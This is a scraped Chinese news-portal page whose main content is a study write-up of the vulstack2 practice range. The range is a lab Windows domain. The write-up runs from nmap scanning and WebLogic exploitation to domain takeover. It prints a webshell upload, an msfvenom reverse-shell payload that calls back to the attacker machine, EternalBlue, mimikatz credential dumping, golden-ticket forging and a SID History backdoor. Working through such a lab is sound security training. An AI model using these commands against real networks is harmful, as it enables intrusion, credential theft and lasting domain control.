最新要闻
- 每日短讯:今日亚盘外汇技术分析(2023年4月19日)
- 资讯推荐:Nuada机械仿生手套:内置多种传感器可用于辅助诊疗
- 小米汽车明年量产!雷军现身上海车展参观众车企:蔚来李斌亲自接待
- 全球信息:科学家在快餐包装中发现PFAS永久化学品:强酸/碱、高温都无法降解
- “变性”、打针都改不了的“坏毛病”:人类还要被折磨多久?
- 全球消息!“发哥”再次雄起!天玑9200+跑分首曝近137万 冠绝安卓
- 不止封杀老头乐!北京将试点在外卖快递车上加装芯片:实时检测轨迹
- 天天即时:2023WTT澳门冠军赛:马龙晋级十六强
- 每日焦点!黄玉强出任中国平安审计责任人
- 天天看点:旷视科技联合中盾安信:AI赋能新时代,营造安全可信的数字环境
- 女子上班6天工资仅发41元:老板以各种理由克扣
- 【世界独家】工人在线向马斯克求助讨薪:首起特斯拉上海工厂致命生产事故意外曝光
- 当前观察:iQOO Neo8系列下月发:标准版骁龙8+ Pro版天玑9200+
- 今日热讯:腾讯发布五一假期未成年人限玩通知:打游戏也要调休
- 【环球播资讯】认同吗?魅族前高管称5千到1万安卓机不值得冲 网友吵翻就苹果值?
- 环球观天下!张轩昊丨操作思路分享【4月19日】今日黄金原油操作建议,实盘交易干货分享!
手机
iphone11大小尺寸是多少?苹果iPhone11和iPhone13的区别是什么?
警方通报辅警执法直播中被撞飞:犯罪嫌疑人已投案
- iphone11大小尺寸是多少?苹果iPhone11和iPhone13的区别是什么?
- 警方通报辅警执法直播中被撞飞:犯罪嫌疑人已投案
- 男子被关545天申国赔:获赔18万多 驳回精神抚慰金
- 3天内26名本土感染者,辽宁确诊人数已超安徽
- 广西柳州一男子因纠纷杀害三人后自首
- 洱海坠机4名机组人员被批准为烈士 数千干部群众悼念
家电
全球微资讯!vulstack2 靶场做题笔记
环境配置
- DC
IP:10.10.10.10OS:Windows 2012
- WEB
默认初始密码登陆不进去,利用 de1ay/1qaz@WSX登陆
IP1:10.10.10.80IP2:192.168.111.80OS:Windows 2008
- pc
IP1:10.10.10.201IP2:192.168.111.201OS:Windows 7
- 攻击机
kali
【资料图】
ip:192.168.111.130
内网网段:10.10.10.0/24
DMZ网段: 192.168.111.0/24
管理员账号密码:Administrator/1qaz@WSX
先从WEB机开始,注意需要手动开启服务,在 C:\Oracle\Middleware\user_projects\domains\base_domain\bin 下有一个 startWeblogic 的批处理,管理员身份运行它即可。
信息收集
假定我们现在有目标ip:192.168.111.80 然后我们现在要进行端口扫描,此时我们ping目标发现无法ping通,此时推测目标开启了防火墙
对于防火墙而言,除非特殊定义,否则全部ICMP消息包将被禁止通过防火墙(即不能使用ping命令来检验网络连接是否建立)。
nmap扫描
nmap -sS -sV 192.168.111.80-sS 使用SYN半开式扫描-sV 探测服务版本信息SYN扫描:nmap向服务器发送一个syn数据报文,如果侦测到端口开放并返回SYN-ACK响应报文,nmap立即中断此次连接
或者直接
nmap -A -Pn -v -T4 192.168.111.80-Pn 禁ping-A 进行全面扫描(操作系统检测、版本检测、脚本检测和跟踪路由)-T4 设置时序,级别越高速度越快-v 显示更加详细的信息
相关信息
PORT STATE SERVICE VERSION80/tcp open http Microsoft IIS httpd 7.5| http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST|_ Potentially risky methods: TRACE|_http-server-header: Microsoft-IIS/7.5|_http-title: Site doesn"t have a title.135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds1433/tcp open ms-sql-s Microsoft SQL Server 2008 R2 10.50.4000.00; SP2| ms-sql-ntlm-info: | Target_Name: DE1AY| NetBIOS_Domain_Name: DE1AY| NetBIOS_Computer_Name: WEB| DNS_Domain_Name: de1ay.com| DNS_Computer_Name: WEB.de1ay.com| DNS_Tree_Name: de1ay.com|_ Product_Version: 6.1.7601| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback| Issuer: commonName=SSL_Self_Signed_Fallback| Public Key type: rsa| Public Key bits: 1024| Signature Algorithm: sha1WithRSAEncryption| Not valid before: 2023-04-12T06:18:51| Not valid after: 2053-04-12T06:18:51| MD5: 1736 763c f611 574c 41f8 1914 2a6b 8b64|_SHA-1: 7559 d877 1a13 24d7 4f13 441e e8f7 9479 9b89 954e|_ssl-date: 2023-04-11T17:07:25+00:00; -14h20m00s from scanner time.3389/tcp open ms-wbt-server?| rdp-ntlm-info: | Target_Name: DE1AY| NetBIOS_Domain_Name: DE1AY| NetBIOS_Computer_Name: WEB| DNS_Domain_Name: de1ay.com| DNS_Computer_Name: WEB.de1ay.com| DNS_Tree_Name: de1ay.com| Product_Version: 6.1.7601|_ System_Time: 2023-04-11T17:06:44+00:00| ssl-cert: Subject: commonName=WEB.de1ay.com| Issuer: commonName=WEB.de1ay.com| Public Key type: rsa| Public Key bits: 2048| Signature Algorithm: sha1WithRSAEncryption| Not valid before: 2023-04-10T15:56:11| Not valid after: 2023-10-10T15:56:11| MD5: 9913 8605 3705 7183 2758 6234 6632 d053|_SHA-1: c00d 9c0a 0e09 7888 2339 74ef 66c5 9736 49d2 22b5|_ssl-date: 2023-04-11T17:07:24+00:00; -14h20m01s from scanner time.7001/tcp open http Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)|_http-title: Error 404--Not Found|_weblogic-t3-info: T3 protocol in use (WebLogic version: 10.3.6.0)49152/tcp open msrpc Microsoft Windows RPC49153/tcp open msrpc Microsoft Windows RPC49154/tcp open msrpc Microsoft Windows RPC49155/tcp open msrpc Microsoft Windows RPC49156/tcp open msrpc Microsoft Windows RPCOS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1| Computer name: WEB| NetBIOS computer name: WEB\x00| Domain name: de1ay.com| Forest name: de1ay.com| FQDN: WEB.de1ay.com
漏洞利用
很明显我们看到7001开放了weblogic服务,当然我们的基本素养就是知道7001端口是weblogc服务的默认端口,然后作为一个脚本小子肯定要用工具扫一下
用工具扫出来发现有 cve-2017-10271、cve-2019-2725漏洞
利用漏洞直接上传一个冰蝎木马
连接冰蝎
利用冰蝎直接反弹一个msf的shell,这里攻击机设置监听
然后利用集成的功能
上去之后我们意识到一个问题就是java维持的shell 没法getsystem,导致没法进一步利用,所以我们这里选择msf生成一个exe木马,上传到目标机器后再进一步利用
systeminfo 查看系统信息
也验证了我们之前端口扫描的 是一台x64机器 win2008r2
生成x64的exe木马
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.111.130 LPORT=6667 -f exe > n.exe
然后直接利用刚才的shell传入目标机器,这里失误传到web目录了,不过无伤大雅
本地设置监听
use exploit/multi/handlerset payload payload/windows/x64/meterpreter/reverse_tcpset lport 6667run
然后利用虚拟机终端运行得到shell
这里的坑点是我之前运行的exe崩溃了,导致后续的exe用虚拟终端运行了而监听的地方没反应
这里也是成功上线了,但是我之前tasklist /svc
的时候发现有360主动防御.exe,网上的一些文章说的是因为360的版本太低,没法杀死我的shell,后来发现这里是我没开启360,就先跳过这个免杀吧 ,后面补上。
进程迁移
有了shell之后简单的进行进程迁移,当前进程迁移到其他进程后 权限可能会根据进程权限而改变 可以找高权限的类似
这里我看这个是高权限的,然后就迁移了一下,莫名其妙获得了system权限,这里没搞懂,挖个坑。也不知道这个是不是真实的system权限
内网信息收集
确定是否是域环境
这里就很明显是了,而且hostname和whoami得到的前缀也不同
systeminfo
确定是域环境:域名为de1ay.com
查看路由表
这个的话就是可以大致得到一个网段的相关信息,以及可能存在的一些pc的ip,这里判断出192.168.111.0/24是外网的,10.10.10.0/24可能是内网的,我觉得dynamic的是要重点关注的
arp -a
网卡相关信息
ipconfig /all
这里我们看到10.10.10.0/24网段的dns服务器为10.10.10.10 极有可能就是域控服务器
查找域控服务器
一般为时间服务器
net time /domain
ping 一下域控,得到ip就是 10.10.10.10
域内主机
net view
我们知道是总共有三台机子的,pc dc web 但是我们这里只发现了dc和web两台机子
net view 这个命令可以查看网络计算机列表和共享的资源,具体的原因就是pc机器没有开启共享
我们到pc机里面看一下 确实是关闭了网络发现和文件、打印机共享
可以使用以下命令查看相应主机,但是吧,我们直接获得的就是域管理员的权限,所以能查看这个,当然相应的我们也可以去看其他的域内组,获得更多信息,至于为啥这里没有看到dc,因为dc机器属于域控制器了,在domain Controllers组里面
net group "domain computers" /domain
域内用户
net user /domain
收集密码
前提是我们需要是一个system权限,这里我是迁移了一下
load_kiwicreds_all
我们知道了 administrator mssql de1ay用户的密码都是1qaz@WSX
简单总结
- 域名:de1ay
- 域内主机: dc 10.10.10.10 pc:10.10.10.201 web:10.10.10.80 192.168.111.80
- 域内用户:administrator de1ay guest krbtgt mssql
横向移动
内网扫描
arp扫描内网网段
run post/windows/gather/arp_scanner RHOSTS=10.10.10.0/24
扫描存活主机:
use auxiliary/scanner/smb/smb_version
这里不知道啥原因error了,不过结果应该和下面没太多区别
netbios做主机存货探测
use auxiliary/scanner/netbios/nbname
这里由于pc机开启了防火墙,所以无法探测到其存活
icmp协议探测
for /L %I in (1,1,254) DO @ping -w 1 -n 1 10.10.10.%I | findstr "TTL="
也是防火墙的原因,没探测到201机器的存活
总之经过以上的探测我们知道了,10.10.10.0/24网段中存在三台主机
- 10.10.10.10-DC
- 10.10.10.80-WEB 也就是当前机器
- 10.10.10.201 推测的话就是PC机器了,因为域内主机有一台是pc 和web
版本扫描
这里还用了smb_version,我推测的话就是扫网段的话用的netbios,对单个目标的话的话就是smb扫描
use auxiliary/scanner/smb/smb_version
这里也是可以知道pc是win7,dc是2012 r2
永恒之蓝
- DC机器
这里注意使用bind_tcp
use exploit/windows/smb/ms17_010_psexecset payload windows/meterpreter/bind_tcpset rhosts 10.10.10.10run
这里直接获得shell
- PC机器
同样的攻击方式没有成功,猜测是因为存在防火墙and 360
psexec
use windows/smb/psexec
这里psexec没通,不知道为啥,密码的话已经不是1qaz@WSX了,因为登陆了dc机器后密码策略改了
权限维持
黄金票据
黄金票据可以在拥有普通域用户权限和KRBTGT账号的哈希的情况下用来获取域管理员权限,上面已经获得域控的 system 权限了,还可以使用黄金票据做权限维持,即使日后当域控权限掉了,也可以再通过域内其他任意机器伪造票据重新获取最高权限。
条件:
1.域名称
de1ay.com
2.域的SID值
wmic useraccount get name,sid
S-1-5-21-2756371121-2868759905-3853650604
3.域的KRBTGT账户NTLM密码哈希
hashdump
82dfc71b72a11ef37d663047bc2088fb
4.伪造用户名
admin
利用kiwi生成黄金票据
golden_ticket_create -d de1ay.com -k 82dfc71b72a11ef37d663047bc2088fb -s S-1-5-21-2756371121-2868759905-3853650604 -u admin -t /home/zinc/admin.ticket
然后使用
kerberos_ticket_use /home/zinc/admin.ticket
SID History域后门
在Windows中,每个用户都有自己的SID。SID的作用主要是跟踪安全主体控制用户连接资源时的访问权限。
如果将A域中的域用户迁移到B域中,那么在B域中该用户的SID会随之改变,进而影响迁移后用户的权限,导致迁移后的用户不能访问本来可以访问的资源。SID History的作用是在域迁移过程中保持域用户的访问权限,即如果迁移后用户的SID改变了,系统会将其原来的SID添加到迁移后用户的SID History属性中,使迁移后的用户保持原有权限、能够访问其原来可以访问的资源。使用mimikatz,可以将SID History属性添加到域中任意用户的SID History属性中。在实战中,如果获得了域管理员权限,则可以将SID History作为实现持久化的方法。
首先我们在域控制器上新建一个恶意用户“whoami”:
net user whoami test123 /add
然后像之前一样用shellcode_inject启动mimikatz,然后执行如下命令,将域管理员Administrator的SID添加到恶意域用户 whoami 的SID History属性中
privilege::debugsid::patchsid::add /sam:whoami /new:Administrator //将Administrator的SID添加到whoami的SID History属性中
注意:在使用mimikatz注入SID之前,需要使用 sid::patch 命令修复NTDS服务,否则无法将高权限的SID注入低权限用户的SID History属性;mimikatz在2.1版本后,将 misc:addsid 模块添加到了 sid:add 模块下。
然后,我们可以用powershell查看一下这个whoami恶意用户的SID History:
load powershellpowershell_shellImport-Module activedirectoryGet-ADUser whoami -Properties sidhistoryGet-ADUser administrator -Properties sidhistory
那么现在我们的whoami用户便拥有了administrator域管理员的权限,并可以用该用户随时登录域控主机。
简单总结
总体流程的话采用信息收集->漏洞利用,好像中间并没有涉及太多隧道搭建的东西,因为都用的msf,所以直接用msf+路由然后处理的,对于360的免杀也没有太多考量,可能是版本太低,没触发?所以后来我干脆用msf+多重编码+捆绑的方法简单免杀了,后续如果学习更多免杀的话再补上吧,总体下来感觉内网部分和1没有啥区别
参考资料:
http://malabis.site/2022/07/29/Vulstack2/#%E6%A8%AA%E5%90%91%E6%8F%90%E6%9D%83
https://mp.weixin.qq.com/s?__biz=Mzg4MjcxMTAwMQ==&mid=2247486662&idx=1&sn=321f2e5de67ef371f452627b8f0c2068&chksm=cf53cc70f8244566004cef6a52e2bc4313bcf64efd551a4f33c2d68d393394f3b4037707fe8e&mpshare=1&scene=23&srcid=0414svYto0eE6JdwovHey2Kl&sharer_sharetime=1681435464853&sharer_shareid=6eea79ff6da57fc6752ab0bc570bf392#rd
https://blog.csdn.net/qq_45290991/article/details/120401976
关键词:
-
全球微资讯!vulstack2 靶场做题笔记
环境配置DCIP:10 10 10 10OS:Windows2012WEB默认初始密码登陆不进去,利用de1ay 1qaz@WSX登陆IP1:10 10 10 80IP2:192 1
来源: 全球微速讯:终于把 Spring Boot 3.0 写成书了!
天天热文:CANN开发实践:4个DVPP内存问题的典型案例解读
全球微资讯!vulstack2 靶场做题笔记
每日短讯:今日亚盘外汇技术分析(2023年4月19日)
微速讯:科创板收盘播报:科创50指数涨0.41% 医药医疗股普遍调整
资讯推荐:Nuada机械仿生手套:内置多种传感器可用于辅助诊疗
小米汽车明年量产!雷军现身上海车展参观众车企:蔚来李斌亲自接待
全球信息:科学家在快餐包装中发现PFAS永久化学品:强酸/碱、高温都无法降解
“变性”、打针都改不了的“坏毛病”:人类还要被折磨多久?
全球消息!“发哥”再次雄起!天玑9200+跑分首曝近137万 冠绝安卓
不止封杀老头乐!北京将试点在外卖快递车上加装芯片:实时检测轨迹
天天即时:2023WTT澳门冠军赛:马龙晋级十六强
每日视点!SPSS安装及破解教程
天天微资讯!从申请到调用:全国快递物流查询 API 使用教程
小鹿线怎么样?
全球速读:ESXi主机报错:其他主机硬件对象的状态(System Management Software 1 SEL Fullness)
顶象uni-app版设备指纹上线,满足企业多平台服务需求
每日焦点!黄玉强出任中国平安审计责任人
天天看点:旷视科技联合中盾安信:AI赋能新时代,营造安全可信的数字环境
女子上班6天工资仅发41元:老板以各种理由克扣
【世界独家】工人在线向马斯克求助讨薪:首起特斯拉上海工厂致命生产事故意外曝光
当前观察:iQOO Neo8系列下月发:标准版骁龙8+ Pro版天玑9200+
今日热讯:腾讯发布五一假期未成年人限玩通知:打游戏也要调休
【环球播资讯】认同吗?魅族前高管称5千到1万安卓机不值得冲 网友吵翻就苹果值?
全球消息!在 Linux 上配置一个 syslog 服务器
焦点短讯!一千个需求如何快速排序?MoSCoW排序法用上了!【No.2】
环球观天下!张轩昊丨操作思路分享【4月19日】今日黄金原油操作建议,实盘交易干货分享!
日本政府考虑取消重要人物街头演讲 改为在室内进行
环球观点:机器一样会“过劳死”!一机器人展览会上连续工作20小时后倒下
要完全停用中国造芯片、PC等绝非虚言!戴尔:正专注从中国以外采购零部件
今日热搜:滴滴自动驾驶卡车KargoBot亮相:一位司机同时“开”多辆卡车
全球快报:为什么终面往往是HR面,核心考察候选人的什么能力?
企业工商四要素核验 API:有效应对商业欺诈和恶意交易的利器
每日快看:C#12预览版释出,新功能一览
俄乌总统先后到访冲突前线,俄媒:战事胶着,普京此访释放重要信号
绿茵生态:子公司休闲旅游项目一期已建成落地
天天速递!外卖员身绑树枝挂吊瓶送外卖 网友:致敬每一位努力的人
焦点快报!这看的是电影?北影节一影片票价炒到8000元
世界报道:今年内上市 比亚迪B级纯电猎装SUV宋L获好评:成熟大厂作品
全球报道:2元/支起速囤!小米/usmile/舒客等电动牙刷刷头狂促
天天热推荐:对标小米13 Ultra!真我11 Pro+外观首曝:圆环镜组、绿色素皮后盖
民生直通车|相对生存率提高 监测系统覆盖全国——我国持续完善癌症防治体系
北斗GPS卫星授时系统介绍(时间同步服务器)
python 多线程详解
天天看热讯:云时代,MySQL到ClickHouse数据同步产品对比推荐
全球焦点!MySQL事务实现原理
“格物致知 叩问苍穹”2023年中国航天踏上新征程
世界热头条丨海南房子合适买吗?《滨江商业广场》优势不足全面解读~
世界今头条!小米13 Ultra被抢购一空!雷军:备货非常困难
全球热点!发改委:下大力气稳定汽车消费 鼓励车企开发乡村“专车”
32.88万起售 全新林肯航海家上市:环绕大屏加持如开星际飞船
环球实时:暗光长焦加持!OPPO Reno10 Pro+来了:堪称“小Find X6”
每日快看:误入“小人国”!华为P60 Pro长焦微距效果惊艳
三星7652机身内存是多少?三星7652参数配置
小米2sc是哪一年上市的?小米2sc参数配置
活性水是什么意思?活性水和直饮水的区别是什么?
红眼病是怎么引起的?红眼病的症状有哪些?
三星笔记本NC10显卡怎么下载?三星笔记本nc10显卡配置
天天观察:香港金管局再承接69.16亿港元沽盘?
打不过啊!本赛季老鹰对绿军0胜5负 场均净负13.2分
国家发展改革委:正在抓紧研究起草关于恢复和扩大消费政策文件
快看点丨极端高温出现 印度一颁奖礼热死11人:每人获赔4.1万
热门:开卷!微软拟自研AI芯片“戴安娜”:降低机器学习成本
黑入iPhone仅需一条iMessage消息!多起NSO“零点击”攻击曝光
米粉首发入手小米13 Ultra:实在太香了 小米11 Pro终于退休了
一体成型无拼接:康巴赫整竹双面砧板69元新低(90元券)
环球热消息:安卓微信暗黑模式怎么设置_设置暗黑模式的方法
环球报道:魏牌全面做强大六/七座市场,“蓝山/高山双旗舰组合”闪耀上海车展
天天热议:软件安全之CRC检测
世界新资讯:六(二)、springMVC数据转换 jacson配置,json中的date由Date格式化输出
[nacos]JAR启动并加载/解析Nacos yml格式的配置文件时,报“java.nio.charset.MalformedInputException:
天天看热讯:山西省政府存量债券柜台市场交易流通业务上线
全国股份转让系统:北京长峰医院因发生重大风险事件,今日起股票停牌
世界快资讯:性能看齐RTX 3060 硬件发烧友打造无风扇显卡
世界热讯:被称为“冰箱杀手”的李斯特菌 到底有多恐怖?
【环球播资讯】小米13 Ultra拆解出炉:后摄几乎占满了主板
全球即时:小米13 Ultra预售秒罄!卢伟冰预言成真:1TB版被抢爆了
79元 小米米家多功能充电台灯开启众筹:一灯多用 秒变手电筒
热头条丨相扑标准动作详解
焦点短讯!4月19日盘前重要公司新闻
天天观速讯丨2023年“泼水节” 西双版纳旅游总收入超21亿元
孔乙己如何再造一个“孔乙己”?
SSD数据不能恢复?或许还有的救
环球视点!最完美的徕卡镜头!小米13 Ultra摄影套装版图赏
新华时评·首季经济形势|巩固企稳回升态势 推动经济运行持续整体好转
观察:实例讲解Playwright(二)
Mysql中的数据类型注意事项
观察:新华时评·首季经济形势|巩固企稳回升态势 推动经济运行持续整体好转
播报:美股异动 | 爱立信(ERIC.US)跌超7% 警告成熟市场5G支出将继续缩减
天天观焦点:哈尔滨还要往北300公里 我国在建最北高铁站取得新进展
五一假期返程火车票今日开抢:千万别忘记
【环球报资讯】239元起!小米发布13大新品 价格信息这里一文看
当前观点:今天小米6发售6周年!雷军推荐“钉子户”升级小米13系列
焦点热讯:关于增加东莞银行股份有限公司为东方人工智能主题混合型证券投资基金销售机构同时开通定投及转换业务的公告
今日热门!读SQL进阶教程笔记12_地址与三值逻辑
环球新消息丨312国道宁镇段快速化改造工程进入基层施工新阶段
世界信息:4月18日基金净值:招商瑞泰1年持有混合A最新净值1.0166,涨0.01%
环球焦点!俄罗斯石油被抢:沙特和阿联酋低价购入 再高价卖给欧洲
松下空调怎么样调睡眠模式 松下空调怎么样
Typora 1.5.12 (windows/MacOs版) 简单高效且实用的Markdown编辑器